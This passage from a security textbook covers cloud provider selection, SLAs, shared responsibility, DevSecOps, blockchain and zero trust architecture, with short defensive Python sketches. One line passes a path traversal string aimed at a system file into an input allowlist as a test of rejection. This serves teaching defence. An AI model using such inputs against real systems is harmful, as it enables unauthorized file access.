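key = b"client-secret-key"          # held by the client only
idx = build_index(key, "doc1", ["grades", "exam", "submission"])
print(search(idx, key, "exam"))     # {'doc1'}
print(search(idx, key, "answers"))  # set()

Note the trade-off this illustrates: because the same keyword always yields the same token, the server can match queries without decrypting, but it can also observe which (encrypted) terms repeat, which is why more sophisticated schemes exist.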

11.4 Step 2: Select a Cloud Provider and Service/Deployment Model

There are two sources of information about the security controls provided by a cloud provider: the Service Level Agreement and documentation about the cloud's web services [6]. One of the first steps in selecting a cloud provider is to obtain its documentation describing its services, including security features. A Service Level Agreement (SLA) is the all-important contract between the cloud provider and client. Security issues a client should carefully consider include [1, 3, 5, 10, 15]:

Regulatory issues
• What do my nation's laws require in protecting my data? What international laws, data privacy laws and state breach laws are my data subject to?
• Where (e.g., which country) will my client data reside, and what government intrusion, security and privacy laws might my data be subject to? What is the cloud provider's policy if law enforcement subpoenas a client's sensitive information?
• What cloud controls are in place to address these regulations? How will breaches be notified and handled? (Ultimately the cloud customer is responsible for security.)
• What are the cloud provider's privacy policies related to client data? What security controls and monitoring are provided for the client?

Cloud Provider Security Implementation
• What controls are implemented by the cloud provider for confidentiality, integrity and availability, or more specifically, authentication, access control, digital certificate exchange, IDS, trusted platform? What network security controls exist?
• What policies and security implementations prevent cloud personnel from accessing and leaking client data?
• What third-party audit processes exist? What does the audit involve and how are results disseminated? How often are audit/compliance results provided? What have previous audit results shown?


• Does the cloud provider maintain and publish metrics on availability (or downtime)?
• What cloud tools are available for testing and monitoring of security? What protocols and restrictions exist for the cloud user to perform vulnerability and penetration testing?
• What types of alarms/logs does the cloud provider monitor for? Are client-system logs available to clients?
• Can clients monitor the usage and access of their data?

Cloud Incident and Disaster Recovery
• What rates of availability does the cloud provider maintain? Can data be maintained redundantly in multiple regions? How is data synchronization achieved? Can the organization's recovery point objectives and recovery time objectives be achieved?
• What are the cloud provider's policies for disaster recovery? How does the cloud provider handle disaster recovery? What is included in the contractual agreements?
• How is incident response handled by the cloud provider? What tools are available to clients to forensically analyze incidents?

Contractual Issues – Cloud Provider and Third Party
• What is the cloud provider's standard Service Level Agreement? Can this SLA be personalized for specific needs?
• If we are under contract to another organization, does the proposed cloud implementation meet our contracts' requirements? What issues does our contract specify or imply?
• What happens at contract termination? What are the cloud provider's data privacy policies? How does data export to another system work, what does it cost, and what are the cloud provider's policies for data destruction?

Cloud Programmability
• What security APIs or form interfaces are supported to automatically configure a security configuration? Does the cloud provider support the API required by the client? What kinds of scripting and key management options does the cloud provider provide?

Cloud Provider Reputation
• Is the cloud provider reputable, financially stable, protected by insurance, and located primarily (or entirely) in the home country? What recent legal cases have involved the cloud provider? (casetext.com can provide details.)

The ability to negotiate the Service Level Agreement may depend on the size of the cloud provider and whether a public or private deployment model is used [6]. Small and private providers may offer more flexibility to vary the SLA, while larger providers may offer more capabilities.


After defining the requirements for the cloud services, it is helpful to define Service Level Objectives (SLOs): metrics that measure the cloud provider's performance against desired goals. A small sketch of automated SLO checking follows.
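As an illustration (not from the text), SLOs can be expressed as machine-checkable thresholds. The metric names and targets below are hypothetical examples of the kind of objectives an SLA might be measured against.

# Hypothetical SLO definitions: each maps a measured metric to a target.
slos = {
    "availability_pct":        {"target": 99.9, "higher_is_better": True},
    "recovery_time_hours":     {"target": 4.0,  "higher_is_better": False},
    "incident_response_hours": {"target": 24.0, "higher_is_better": False},
}

def evaluate_slos(measured: dict) -> dict:
    """Compare measured provider metrics against SLO targets."""
    results = {}
    for name, slo in slos.items():
        value = measured.get(name)
        if value is None:
            results[name] = "NOT REPORTED"   # a contract/monitoring gap
        elif slo["higher_is_better"]:
            results[name] = "MET" if value >= slo["target"] else "MISSED"
        else:
            results[name] = "MET" if value <= slo["target"] else "MISSED"
    return results

# Example monthly figures from provider reports or the client's own monitoring:
print(evaluate_slos({"availability_pct": 99.95, "recovery_time_hours": 6.5}))
# {'availability_pct': 'MET', 'recovery_time_hours': 'MISSED',
#  'incident_response_hours': 'NOT REPORTED'}

A "NOT REPORTED" result is itself useful output: it flags a metric the SLA promises but that no one is actually collecting.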

11.5 Step 3: Define the Architecture

Architectures are generally layered, consisting of the following layers:
Software as a Service: Contains the presentation-layer software (e.g., the web interface to the user) and the application programming interface to a multitenant application with local data.
Platform as a Service: Consists of integration and middleware software, including base software such as an OS with a database.
Infrastructure as a Service: Consists of the virtual machine abstraction, hardware, networking and storage facilities.
Virtualization: The cloud depends on virtualization to separate services and tenants. The cloud provider is responsible for minimally securing the hardware and hypervisor, but the customer is responsible for the security controls within the virtual environment.
Multicloud system: If multiple cloud services are used, this may result in potential interface issues.

11.6 Step 4–6: Assess and Implement Security Controls in the Cloud

It is important to remember, with the Shared Responsibility Model, that both the cloud provider and cloud users are responsible for aspects of security: the cloud provider secures what it configures and manages, whereas the cloud user is responsible for the portion that the user defines and manages. Another way of saying this is that the cloud user selects, orders and pays for security, whereas the cloud provider implements what cloud users configure and pay for. Cloud users should complete a security matrix that apportions the security controls provided by the cloud provider and the additional controls they need to configure and manage. The Cloud Security Alliance [6] provides a Cloud Controls Matrix that can be downloaded for use. Also consider that moving data from within a company intranet to the cloud/Internet raises the accessibility of the data worldwide: what functions and actions should be available from which locations? Figure 11.4 provides a diagram of the Shared Responsibility Model, where the lower, darker reddish components are primarily the responsibility of the cloud provider (according to contract options) and the upper, lighter blue components are primarily the responsibility of the customer (it is slightly simplified from [18]). A small sketch of such a security matrix appears after Fig. 11.4.


Fig. 11.4  Shared responsibility model: IaaS versus SaaS
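As an illustration of the security matrix mentioned above (the control names and ownership assignments are hypothetical, not taken from the Cloud Controls Matrix), the matrix can be as simple as a mapping that makes ownership gaps visible:

# Hypothetical apportioning of controls under a shared responsibility model.
controls = {
    "physical datacenter security": "provider",
    "hypervisor patching":          "provider",
    "guest OS patching":            "customer",
    "application access control":   "customer",
    "encryption key management":    None,        # unassigned: a gap to resolve
}

gaps = [name for name, owner in controls.items() if owner is None]
print("Unassigned controls:", gaps)
# Unassigned controls: ['encryption key management']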

Popular security controls that cloud users deploy, in order of popularity (60.7–44.5%), include web application firewalls, network access controls, NIDS, VPNs, network antimalware, network traffic analysis and data loss prevention software [15]. These tools are only getting more popular, as many respondents not yet using specific controls planned to implement them in the next year. The Cloud Security Alliance [6] highly recommends multifactor authentication for all services in the cloud. When software is developed in-house, the following tools are useful before software deployment [4]:
• Static analysis: scans code automatically, looking for programming vulnerabilities and bugs.
• Container image scanning: static scanning of a container can check configuration issues and known vulnerabilities.
• Automated testing: includes regression testing and fuzzing before release.
• Other software development techniques: risk analysis, code reviews, etc., covered in later chapters.
After software deployment:
• Runtime application self-protection: monitors an application to notify of unusual system uses or violations of policy.
• Web application firewalls: track user accesses to the application and validate some input; allowlisting can be helpful (see the sketch after this list).
• Vulnerability scanning and penetration testing: test the run-time environment after deployment.
• Network detection and response (NDR) and network traffic analysis (NTA): monitor for unusual network traffic patterns, preferably via machine learning.
• Host intrusion detection systems: track changes to the system, files and configuration to adhere to policy.
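As a minimal illustration of the allowlisting idea mentioned above (a hypothetical input filter, not any particular WAF product), a web front end can accept only input matching explicitly permitted patterns and reject everything else:

import re

# Allowlist: accept only patterns known to be good; deny everything else.
ALLOWED_FIELDS = {
    "student_id": re.compile(r"^[0-9]{7}$"),
    "course":     re.compile(r"^[A-Z]{2,4}-[0-9]{3}$"),
    "filename":   re.compile(r"^[\w\-]{1,64}\.(pdf|docx|txt)$"),
}

def validate(field: str, value: str) -> bool:
    """Return True only if the field exists and the value matches
    its allowlisted pattern; unknown fields are rejected outright."""
    pattern = ALLOWED_FIELDS.get(field)
    return bool(pattern and pattern.fullmatch(value))

print(validate("course", "CS-431"))            # True
print(validate("filename", "../etc/passwd"))   # False (path traversal attempt)
print(validate("comment", "hello"))            # False (unknown field)

The design choice is deny-by-default: anything not explicitly permitted fails, which is the opposite of a blocklist that tries to enumerate every known bad input.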


At a more detailed level, cloud security services/features may include a Secure Access Service Edge (SASE) architecture, which includes the following components [17]:
Cloud access security broker (CASB): controls and monitors traffic between an organization's users and the cloud services, and may perform access control functions.
Secure web gateway (SWG): analyzes and logs inbound web accesses and filters malware and attacks.
Firewall-as-a-service (FWaaS): enables the cloud customer to custom-configure the firewall to protect their cloud services.
Zero Trust Network: an emerging technology enabling transactional verification; see the second part of this chapter for more details.
Currently, AWS's default configuration policy is to restrict all access through the network firewall to new customer applications: the customer must configure the firewall to enable any traffic through. This enables customers to securely configure their cloud system without threat of attack, but also places the burden of firewall configuration on the customer. With blanket defaults, it is very easy for the customer to misconfigure. A toy sketch of default-deny rule evaluation follows.
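The following is a minimal sketch of the default-deny principle described above (a toy rule evaluator, not AWS's actual firewall or API): traffic is dropped unless an explicitly configured rule allows it.

from dataclasses import dataclass

@dataclass
class Rule:
    protocol: str   # e.g., "tcp"
    port: int       # destination port
    prefix: str     # simplistic source-address prefix match, e.g., "203.0.113."

def allowed(rules, protocol: str, port: int, src_ip: str) -> bool:
    """Default deny: permit only traffic matching an explicit allow rule."""
    for r in rules:
        if r.protocol == protocol and r.port == port and src_ip.startswith(r.prefix):
            return True
    return False  # no matching rule means the packet is dropped

# New deployments start with no rules: everything is denied.
rules = []
print(allowed(rules, "tcp", 443, "203.0.113.9"))   # False

# The customer must explicitly open only what the application needs.
rules.append(Rule("tcp", 443, "203.0.113."))
print(allowed(rules, "tcp", 443, "203.0.113.9"))   # True
print(allowed(rules, "tcp", 22, "203.0.113.9"))    # False: SSH still blocked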

11.7 Step 7: Monitor and Manage Changes in the Cloud

The contract defines which measures are available from the cloud provider. Statistics may be obtained from the user's or provider's controls, according to the shared responsibility model and SLA. Monitoring third-party audit results, if so contracted, provides a snapshot of the quality of security. For security purposes, it is important to have knowledge of statistics and events; in fact, a good baseline can help in security monitoring. When an incident occurs, it is impossible to do forensic analysis onsite. However, the VM can be imaged for forensic analysis [7]. It is recommended to analyze logs not only from the VM but also from its host machine. Note that criminals often establish their own clouds in nations that limit forensic oversight. Key Process Indicators related to cloud deployment may include [4]:
• Number of open security vulnerabilities
• False positive rates of reported vulnerabilities
• Time to detect security vulnerabilities
• Time to fix security vulnerabilities
• Number of security vulnerabilities found after deployment
• Cost to fix audit issues

Some of these statistics are difficult to measure properly or require fine tuning, including time-to-detect and false positive rates. Also, open vulnerabilities should


be resolved by priority, and not simply to lower statistics. Finally, numbers of vulnerabilities tend to follow patterns and tend to increase following deployment. KPIs related to cloud software deployment include [4] (a small sketch of computing such KPIs follows this list):
• Automated test coverage
• Change cycle time: time to build and deploy
• Rate of build delays due to security issues
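As an illustration (the record format is hypothetical, not from the text), several of the vulnerability KPIs above reduce to simple arithmetic over tracked vulnerability records:

from datetime import date

# Hypothetical vulnerability tracking records.
vulns = [
    {"detected": date(2024, 1, 3),  "fixed": date(2024, 1, 10), "post_deploy": False},
    {"detected": date(2024, 1, 15), "fixed": None,              "post_deploy": True},
    {"detected": date(2024, 2, 1),  "fixed": date(2024, 2, 20), "post_deploy": True},
]

open_vulns = sum(1 for v in vulns if v["fixed"] is None)
fixed = [v for v in vulns if v["fixed"] is not None]
mean_days_to_fix = sum((v["fixed"] - v["detected"]).days for v in fixed) / len(fixed)
found_after_deploy = sum(1 for v in vulns if v["post_deploy"])

print(f"Open vulnerabilities: {open_vulns}")            # 1
print(f"Mean time to fix (days): {mean_days_to_fix}")   # 13.0
print(f"Found after deployment: {found_after_deploy}")  # 2

As the text cautions, such numbers need interpretation: a falling open-vulnerability count is meaningless if the fixes were not prioritized by risk.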

11.8 Advanced: Software Development with Dev-Sec-Ops

Dev-Sec-Ops refers to Development-Security-Operations: these three groups working closely together to secure software during development and deployment. Dev-Sec-Ops concepts include [4]:
Continuous Integration/Continuous Delivery (CI/CD)  Automated build, integration, testing, and deployment ensures that both new applications and software patches are automatically configured and deployed quickly, following compliance policies. Automated and thorough testing is very important in this scheme. (An attack on SolarWinds software took advantage of automatic building to insert a backdoor via an attack 'software update' that was propagated to its customers. SolarWinds took a number of steps to fix this vulnerability, including analyzing the build against source code to ensure correctness.) CI/CD can be implemented using specific programming languages to automatically configure and provision a software stack for deployment on the cloud. For example, Terraform has HCL, a high-level language that can be used across multiple cloud providers.
Compliance Testing  Asserts or guard rails are true/false tests that enable policy checking within the code, thereby automating test results and facilitating auditing via these audit hooks. Open source tools have been developed to accomplish this: AWS CloudFormation Guard, Chef InSpec, Conftest, Dev-sec.io, and Terraform Compliance. A minimal sketch of the guard-rail idea follows this section.
Continuous Monitoring  The Cloud Trust Protocol (CTP) defines an API that enables customers to automatically query the security status of their cloud services.
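The following is a minimal sketch of the guard-rail idea in plain Python (not one of the tools named above; the configuration format and policy rules are hypothetical). Each rule is a named true/false test over a declared configuration, and the results double as audit evidence.

# Hypothetical declared configuration for a cloud storage resource.
config = {
    "storage_bucket": {
        "encryption_at_rest": True,
        "public_read": False,
        "logging_enabled": False,
    }
}

# Guard rails: each policy is a named true/false test over the configuration.
POLICIES = {
    "encryption must be enabled": lambda c: c["encryption_at_rest"] is True,
    "bucket must not be public":  lambda c: c["public_read"] is False,
    "access logging required":    lambda c: c["logging_enabled"] is True,
}

def check_compliance(resource: dict):
    """Run every guard rail; failed checks can block the CI/CD pipeline."""
    return [(name, test(resource)) for name, test in POLICIES.items()]

for name, passed in check_compliance(config["storage_bucket"]):
    print(f"{'PASS' if passed else 'FAIL'}: {name}")
# PASS: encryption must be enabled
# PASS: bucket must not be public
# FAIL: access logging required

In a CI/CD pipeline, a FAIL result would typically fail the build, preventing a non-compliant configuration from ever being deployed.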

11.9 Advanced: Using Blockchain

Blockchain is a solution that helps to encrypt transmissions and ensure their integrity. It is used to process bitcoin, smart contracts and financial transaction requests, and its use is expanding in the Internet of Things (IoT) [14].


Fig. 11.5  Processing Blockchains

Blockchains provide a decentralized system of distributed and replicated nodes [14]. Transactions must be correctly ordered across all nodes using consensus algorithms. In the public-style Proof-of-Work blockchain, User A submits a transaction to User B, which is broadcast and saved in the blockchain memory pool (see Fig. 11.5). A 'peer' miner process selects a transaction, generates a computationally expensive hash to confirm the transaction, creates a block, and adds the block to the blockchain and back to the distributed memory pool. Algorithms are also defined to ensure unanimously ordered transactions. Transaction processing confirms that the sender has the required funds, and the sender signs the transaction with their digital signature, providing non-repudiation. Users submitting transactions pay a mining fee to incentivize miners to perform the necessary processing. However, blockchain is not foolproof [14]. Public blockchains (including Bitcoin) can be problematic, since they provide anonymous access to the public. Distributed DoS attacks have considerably slowed down processing. Integrity hash code failures have resulted in spoofed transactions costing millions of dollars. Private blockchains are better protected because users are vetted, known and trusted. A toy proof-of-work sketch follows.
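Below is a toy proof-of-work sketch (illustrative only; real blockchains add Merkle trees, digital signatures and networked consensus). The miner searches for a nonce whose block hash meets a difficulty target, which is the computationally expensive hash that confirms a block.

import hashlib

def mine_block(prev_hash: str, transactions: str, difficulty: int = 4):
    """Find a nonce so the block hash starts with `difficulty` zeros."""
    nonce = 0
    while True:
        header = f"{prev_hash}|{transactions}|{nonce}".encode()
        digest = hashlib.sha256(header).hexdigest()
        if digest.startswith("0" * difficulty):
            return nonce, digest   # proof-of-work found
        nonce += 1

# Each block commits to its predecessor's hash, chaining integrity:
genesis = "0" * 64
nonce, h1 = mine_block(genesis, "A pays B 5")
print(f"block 1: nonce={nonce}, hash={h1}")
nonce, h2 = mine_block(h1, "B pays C 2")
print(f"block 2: nonce={nonce}, hash={h2}")
# Tampering with "A pays B 5" changes h1, invalidating block 2's link.

Because each block's hash depends on the previous block's hash, rewriting any historical transaction would require redoing the proof-of-work for every subsequent block, which is what makes tampering expensive.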

11.10 Advanced: Zero Trust

Many people have the impression that security consists of building a safe firewall, and that all network traffic within the firewall's perimeter can be trusted. This is a false assumption: the first stage of an attack is to get a foothold within the internal network, and successive steps then occur within the network. That first stage may occur via phishing, pharming, SQL attacks, and other means. In addition, bring-your-own-device (the use of private devices within the organization) introduces minimally controlled or uncontrolled devices within the network perimeter.


Finally, where is that perimeter when an organization depends heavily on the cloud or a third-party organization? Zero Trust Architecture depends upon deperimeterization, which avoids granting trust based on internal network location alone [13]. Furthermore, zero trust assumes the internal network is already compromised and that criminals are already crawling around the organization's network. These are not unreasonable assumptions. To counter these threats, zero trust uses artificial intelligence to confirm that all transactions are based on a current status of least privilege. Although zero trust is a new approach, it has already proven to be effective: IBM Security's Cost of a Data Breach Report indicates that the total average cost of a data breach, normally $5.04 million, can be reduced to $3.71 million or $3.24 million with a middle-stage or mature-stage zero trust deployment, respectively; a considerable savings [8].

11.10.1 Important Concepts

The zero trust architecture continually determines confidence in transactions by evaluating risk in real time, based on each subject's [13]:
• multi-factor authentication at initiation of connection;
• device configuration, location and time of access, etc.;
• permissible behavior, and current behavior in comparison to traditional behavior; and
• permissions or access control, and recent actions related to devices and data.
Thus, authorization is managed by automated security (artificial intelligence) and may change due to time-of-day, the state of the resource, and the subject's behavior. Zero Trust principles include [13]:
• All data sources and computing services are considered resources. Therefore, all enterprise-owned resources are carefully classified.
• All communications are secured regardless of network location: all transmissions inside or outside an enterprise network are equally subject to CIA.
• Access to individual organizational resources is granted on a per-session basis: it is important to confirm the identity of the subject who initiates the transaction and enforce least privilege access for authorized individuals. However, authentication is provided on a per-resource basis (not per transaction).
• All resource authentication and authorization are dynamically and strictly enforced before access is allowed: policy and risk decide (re)authentication and permissions.
• Access to resources is determined by a dynamic policy: risk is evaluated based on multiple factors, including client identity, service requested, asset configuration, past history and other current factors.


• The organization monitors and measures the integrity and security posture of all owned and associated assets: all devices and assets are monitored for intrusion, vulnerabilities, and patching; associated assets include bring-your-own-device.
• The organization collects information continually to achieve a current state of assets, network infrastructure and transmissions, in order to maintain an accurate security state: risk is determined by monitoring the current state of the complete network picture.

11.10.2 Zero Trust Architecture

These principles are achieved through a secure architecture composed of a variety of security-controlled components. Those components update continuously, based on a set of inputs including access control permissions, policy, current security status and threat intelligence. Policy can be controlled via an industry compliance system, which constrains policy related to regulation (e.g., HIPAA or GDPR). Access control is then implemented using an ID management system, which manages user accounts and identity (e.g., via the Lightweight Directory Access Protocol, LDAP) through permissions allocated to roles and/or individuals. The current security status may be fed by a Security Information & Event Management (SIEM) system, which tracks network, system and application events; a Threat Intelligence Feed, which provides internal and/or external sources of newly found threats; and a Continuous Diagnostics and Mitigation (CDM) system, which tracks the status of vulnerabilities, patching, and metrics collection. Finally, an Enterprise Public Key Infrastructure generates and tests certificates related to authentication/authorization [13].
Figure 11.6 shows the general structure of a zero trust network. The client system contains an Agent, which interfaces with the Policy Decision Point. A Policy Decision Point (PDP) serves as a source of intelligence that decides on a per-transaction basis whether each proposed transaction may complete or not. The PDP includes two parts: a Policy Engine and a Policy Administrator. The Policy Engine makes and logs accept/reject decisions, based on the set of inputs discussed previously, as well as current subject history: unusual time, source location, number of accesses, and other forms of unusual or illegal behavior. The Policy Administrator then informs the Policy Enforcement Point of the decision, which may range from accepting the transaction to closing the connection [13]. The Policy Enforcement Point (PEP) is like a sophisticated proxy/firewall that optimally protects on a per-device basis, ensuring that all transactions are approved before being processed by the Device(s) it protects. The PEP thus has the ability to enable, monitor, and terminate connections. The PEP can be housed within the Device providing service, or be separate from it.
There are three possible configurations for zero trust networks, according to the National Institute of Standards and Technology (NIST) [13]. The first, Identity-based access, is the simplest and least mature.


Fig. 11.6  Zero trust architecture (diagram: within a software-defined network configuration, a Subject's Enterprise System with Agent, which interfaces with the PA/PE, sends a transaction request to the Policy Administrator/Policy Engine, where Decision = EvaluateTransaction(request, policy, input); the actual transaction then flows through the Policy Enforcement Point, a gateway ensuring all transactions are approved, to the Resource or set of resources)

Identity-based access checks for permissions on a granular, per-transaction basis, allocated based on the source identity. This technique is useful for cloud services, where the server may be separate from the local device and housed within a virtual machine or container. The major issue with this configuration is limited visibility into the client system configuration. The second possible configuration is Micro-segmentation, where an individual resource or set of resources is protected by a local gateway/PEP, as shown in Fig. 11.6. Multiple legacy systems may use a single PEP. However, this configuration has a higher possibility of cross-contamination, where one Device becomes infected and infects its neighbors inside the PEP's internal network. A Software defined network is the most sophisticated configuration, where a dynamic micro-network reconfigures as necessary. The PEP configures the communications channel for the Subject to interface with the Resource (e.g., IP address/port, encryption key). The PEP may be a software agent within the Resource or a separate device. While Fig. 11.6 appears as a single-network solution, zero trust is designed to be cloud-compatible. An advantage of a cloud implementation is that the cloud can provide high availability and remote access to any service and/or PDP, when contracted to do so. Even though common apps may be available in the cloud (email, web), their PDP may be located in the same or a different cloud or in the home network, although the PEP should be located with its Resource (see the example in Fig. 11.7). The PEP provides statistics to the PDP and gets configuration permissions from the PDP, but may or may not be located with the PDP. For better transparency, the intention is that clouds may use different systems. A minimal sketch of a Policy Engine decision follows.
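The following is a minimal sketch of the per-transaction decision that the Policy Engine makes (the risk factors and thresholds are hypothetical; a real engine would weigh far richer inputs, such as SIEM events, CDM posture and threat intelligence):

def evaluate_transaction(request: dict, policy: dict, context: dict) -> str:
    """Toy Policy Engine: score risk factors and compare to policy thresholds."""
    risk = 0
    if not context.get("device_managed"):        # unmanaged/BYOD device
        risk += 3
    if context.get("hour") not in range(7, 20):  # access outside usual hours
        risk += 2
    if context.get("failed_logins", 0) > 2:      # recent authentication failures
        risk += 2
    if request["action"] not in policy.get(request["role"], set()):
        return "reject"                          # least privilege: never permitted
    if risk >= policy["deny_threshold"]:
        return "reject"
    if risk >= policy["step_up_threshold"]:
        return "reauthenticate"                  # require fresh MFA first
    return "accept"

policy = {"advisor": {"read_grades"}, "registrar": {"read_grades", "edit_grades"},
          "deny_threshold": 5, "step_up_threshold": 3}

print(evaluate_transaction({"role": "advisor", "action": "read_grades"},
                           policy, {"device_managed": True, "hour": 10}))   # accept
print(evaluate_transaction({"role": "advisor", "action": "edit_grades"},
                           policy, {"device_managed": True, "hour": 10}))   # reject
print(evaluate_transaction({"role": "registrar", "action": "edit_grades"},
                           policy, {"device_managed": False, "hour": 2}))   # reject

Note that the decision is made per transaction from current context: the same registrar who is accepted from a managed device during business hours is rejected from an unmanaged device at 2 a.m.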


Fig. 11.7  A potential zero trust cloud configuration

11.11 Zero Trust Planning

The basic steps to implement a zero trust network include [13]: inventory and assess data flows; assess risk; develop policy; and deploy and monitor operations.
Step 1: Inventory and assess data flows, workflows, subjects
You may leverage your information classification and role-based access control from the Information Security chapter.
Step 2: Assess risk
It is useful to test a small application first, and expand to more applications as the organization gains confidence in its zero trust implementation. To choose that first or second pilot application, consider:
• Which applications require higher levels of confidentiality and integrity that could benefit from zero trust?
• Which application(s) are accessed more remotely, benefitting from the increased security of a zero trust configuration?
• Which small application(s) might act as a pilot platform, with lower availability and reliability requirements for initial testing?
Step 3: Develop policy
Consider how to use zero trust to further restrict access to roles and verify device configurations. Part of this risk assessment is to tighten policy around the selected application(s), but not to hinder valid access to the resources. The goal of a tuning phase is to find a good balance. It will be important to find technical compatibility between zero trust components, to support the application and ensure sufficient security to guard and monitor it.


Step 4: Deploy and monitor operations
It may be helpful to be somewhat lenient in the policies initially, balancing this with greater logging and monitoring, until anomalous behavior is automatically recognized.

11.11.1 Network and Cloud Checklist for Zero Trust

Here is a recommended checklist that a zero trust network would enforce [13].
Architectural points:
1. The Zero Trust Architecture must be scalable to support expected and increased traffic capacities.
2. PEPs are accessible to policy-approved devices, but may not be accessible to all organizational devices, such as those in international locations.
3. The organization tracks all affected network data. The Policy Engine is aware of and tracks all communication metadata (from the data plane), enabling the policy to be dynamically updated. This metadata includes the time, destination, and device ID.
4. Zero Trust Architectures are cloud-compatible: it is not necessary to traverse the organization's private network to access a Resource, nor is it required that virtual private network protocols be used.
Security details:
1. The network must be able to validate that the source device is an enterprise-owned/managed device and uses enterprise-issued credentials. This is important because the IP/MAC address can be spoofed.
2. Resources should not be discoverable except through a PEP (except network devices, e.g., DNS), and these resources can only be accessed after being filtered by a PEP.
3. The data plane and control plane are logically separate, meaning that the data connection between the client (containing an agent) and the Resource cannot contain commands to accept or reject the transaction. The two protocol components may be physically separate.

11.12 Questions

1. Cloud Vocabulary. Match each meaning with the correct word.
Blockchain; Private cloud; Hybrid cloud; Platform as a service; Public cloud; Community cloud; Software as a service; Disaster recovery as a service; Infrastructure as a service; Shadow IT; Multitenancy; Multicloud; Continuous testing; Dev-sec-ops; Continuous monitoring; Continuous integration/continuous delivery; Service level agreement; Shared security model

(a) Employees may be using cloud services without their business knowing about it
(b) A customer uses multiple cloud platforms to implement software solutions
(c) Consumer provides application software; cloud provider generally provides system and software development environment
(d) Cloud build is patched and deployed automatically
(e) A solution that orders, encrypts and ensures integrity for the transmissions of transactions
(f) Customer can get security status on their cloud system on demand
(g) An issue where a customer may share cloud hardware/software with other customers
(h) A business contract between a cloud provider and cloud user
(i) A cloud service is open to any organization
(j) The cloud service provider provides all aspects of implementation: hardware, OS, software
(k) A group within a business that helps to configure, secure and manage cloud software
(l) A cloud service that is configured for a particular industry, via support of industry-specific software and regulations
(m) When using the cloud, it is important to evaluate which security controls are provided by the cloud versus the customer

2. Security Planning: Consider an industry you currently work in or would like to work in. Assume you want to move your main database into the cloud. Prepare security requirements for the Service Level Agreement, by providing answers or research notes for the questions in Step 2. These are also provided in the Workbook.

3. Zero Trust Vocabulary. Match each meaning with the correct word.
Micro-segmentation; Policy decision point; Software defined network; Policy enforcement point; Identity-based access

(a) A configuration where an individual or small set of resources is protected by a Policy Enforcement Point (PEP)
(b) A component in a zero-trust network responsible for evaluating the appropriateness of a transaction, based on user authorization, past history, recent actions, current threats
(c) A configuration where granular permissions are allocated based on source identity (login, IP, time, date)
(d) A configuration where micro-networks may be reconfigured dynamically as necessary
(e) A component in a zero-trust network that serves as a firewall, implementing policy to accept or reject transactions

References
1. Ardagna CA, Asal R, Damiani E, Vu QH (2015) From security to assurance in the cloud: a survey. ACM Computing Surveys 48(1):2.1–2.50
2. Baginda YP, Affandi A, Pratomo I (2018) Analysis of RTO and RPO of a service stored on Amazon Web Service (AWS) and Google Cloud Engine (GCE). In: 2018 10th International Conference on Information Technology and Electrical Engineering (ICITEE), IEEE, pp 418–422
3. Behl A, Behl K (2012) Security paradigms for cloud computing. In: Fourth international conference on computational intelligence, communication systems and networks. IEEE Computer Society, pp 200–205
4. Bird J, Johnson E (2021) A SANS survey: rethinking the Sec in DevSecOps: security as code. SANS Institute, June 2021
5. Cichonski P, Millar T, Grance T, Scarfone K (2012) NIST special publication (SP) 800-61 computer security incident handling guide, Rev. 2, Aug 2012. National Institute of Standards and Technology, pp 261–262
6. Cloud Security Alliance (2021) Security guidance for critical areas of focus in cloud computing, version 4.0. https://cloudsecurityalliance.org/download/security-guidance-v4/
7. Easttom C (2019) System forensics, investigation, and response, 3rd edn. Jones & Bartlett Learning, Burlington
8. IBM (2021) Cost of a data breach report 2021. IBM
9. ISACA (2020) CDPSE review manual. ISACA, Schaumburg
10. Krutz RL (2010) Cloud security: a comprehensive guide to secure cloud computing. Wiley, Hoboken, pp 2, 39–45
11. Messier R (2017) Network forensics. Wiley, Indianapolis
12. Perlroth N, Shane S (2013) As FBI pursued Snowden, an e-mail service stood firm. New York Times, Oct 2, 2013
13. Rose S, Borchert O, Mitchell S, Connelly S (2020) NIST special publication 800-207 zero trust architecture. National Institute of Standards and Technology (NIST), Gaithersburg
14. Saad M, Spaulding J, Njilla L, Kamhoua C, Shetty S, Nyang DH, Mohaisen D (2020) Exploring the attack surface of blockchain: a comprehensive survey. IEEE Commun Surv Tutor 22(3):1977–2008
15. Shackleford D (2021) A SANS survey: network security in the cloud. SANS Institute
16. Tang J, Cui Y, Li Q, Ren K, Liu J, Buyya R (2016) Ensuring security and privacy preservation for cloud data services. ACM Computing Surveys 49(1): Article 13, June 2016
17. Wagenseil P (2022) What is SASE? SC Magazine, Nov 11, 2022. https://www.scmagazine.com/resource/cloud-security/what-is-sase
18. Ruback H, Richards T (2021) Applying the AWS shared responsibility model to your GxP solution. Amazon, 9 February 2021. https://aws.amazon.com/blogs/industries/applying-the-aws-shared-responsibility-model-to-your-gxp-solution/

Chapter 12

Organizing Personnel Security

Among the few high-profile organizations that was not actually hacked last year was the Democratic National Committee. Going into 2020, Bob Lord, the D.N.C.'s first chief information security officer, employed a novel approach to help ensure that hackers stayed out of D.N.C. emails this time. He posted signs over the urinals in the men's room and on the wall in the women's room reminding everyone to run their phone updates, use the encrypted app Signal for sensitive communications and not click on links. –Nicole Perlroth, author, This Is How They Tell Me the World Ends, and NY Times cybersecurity writer [1]

What does computer security have to do with personnel? Verizon's 2022 Data Breach Investigations Report reveals that 82% of breaches involve people [2], whether through stolen credentials, phishing, misuse or simply unintentional error. Among errors, misconfiguration and misdelivery are two mistakes that cause breaches; these are solely attributable to internal actors (commonly employees). Misdelivery usually occurs when emails are sent to the wrong person(s), but can also involve physical documents. Lost or stolen laptops, cell phones, documents and backups are also common, often left in a car or elsewhere. Privilege misuse includes people using the privileges required to do their jobs to steal information for financial, espionage, or grudge reasons, or people bypassing security controls for convenience [2]. Social engineering attacks are another security issue, whether phishing or stolen credentials (e.g., business email compromise). Security experts are less likely than ordinary staff to make simple security mistakes with phishing. If a social engineer pretends to be a system administrator and asks an employee to perform suspicious actions, security staff will not likely be fooled, but some ordinary staff could be. Since security is only as strong as the weakest link, a major goal of personnel security is to ensure that all staff understand policies, know their security responsibilities, and are sufficiently trained to perform these security responsibilities. Thus, it is useful for the security designer (you) to have completed all of the pertinent chapters in the book, so that you can define the security roles and training. How can you assign security responsibilities and design security training unless you understand what each role involves?



